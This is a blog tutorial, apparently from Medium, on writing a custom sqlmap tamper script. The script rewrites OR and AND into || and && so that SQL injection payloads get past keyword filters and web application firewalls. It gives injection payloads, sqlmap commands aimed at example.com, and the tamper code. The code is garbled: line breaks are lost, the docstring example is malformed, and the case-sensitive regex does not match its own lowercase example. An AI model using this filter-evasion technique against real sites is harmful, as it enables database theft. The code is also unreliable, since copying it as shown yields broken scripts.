How to write custom tamper scripts for sqlmap

Introduction

SQLmap is a very useful tool when you want to automatize the exploitation of a SQL Injection vulnerability and extract protected data from a web site. Often, in order to defend against this type of attacks, developers introduce some keyword filters and/or use a WAF (Web Application Firewall) that blocks common SQL Injections payloads.

/AND|OR/i
' or 1=1#
' and 1=2#
' Or 5=5#
' AnD 6=7#
' || 1=1#
' && 1=2#
sqlmap -u http://www.example.com?param=test -p param -v3
Some of the payloads sent by sqlmap. Note the presence of AND keyword.
Some of the payloads sent by sqlmap. Note the presence of the AND keyword.

Writing the script

This is the template we will use for the tamper script, we will call it tamper.py:

#!/usr/bin/env pythonfrom lib.core.enums import PRIORITYimport re
__priority__ = PRIORITY.NORMAL
def dependencies(): passdef tamper(payload, **kwargs): return payload
Content of the file /usr/share/sqlmap/lib/core/enums.py.
def tamper(payload, **kwargs):"""Replace OR and AND keywords with || and &&>>> tamper(' or 1=1#)' || or 1=1#"""    retVal = ""    retVal = re.sub('\\bOR\\b', '||', payload)    retVal = re.sub('\\bAND\\b', '&&', retVal)    return retVal
  • escape the backslash character “\” inside the python string with another backslash. Eg. \ becomes \\. If you do not do this the python interpreter will escape the character “b” and the regex will not be valid (I.e “\b” becomes “b”).
#!/usr/bin/env pythonfrom lib.core.enums import PRIORITYimport re__priority__ = PRIORITY.NORMAL
def dependencies(): passdef tamper(payload, **kwargs):"""Replace OR and AND keywords with || and &&>>> tamper(' or 1=1#)' || or 1=1#""" retVal = "" retVal = re.sub('\\bOR\\b', '||', payload) retVal = re.sub('\\bAND\\b', '&&', retVal) return retVal
sqlmap -u http://www.example.com?param=test -p param -v3 --tamper=<directory of your choice>/tamper.py
As you can see the AND keyword in the image before now is correctly replaced with the logical && operator.

References

--

--

Web security and Crypto. I’m a Software Security consultant and Freelance Web3 Developer. Follow me on Twitter! @luca_dd7

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Luca Di Domenico

Web security and Crypto. I’m a Software Security consultant and Freelance Web3 Developer. Follow me on Twitter! @luca_dd7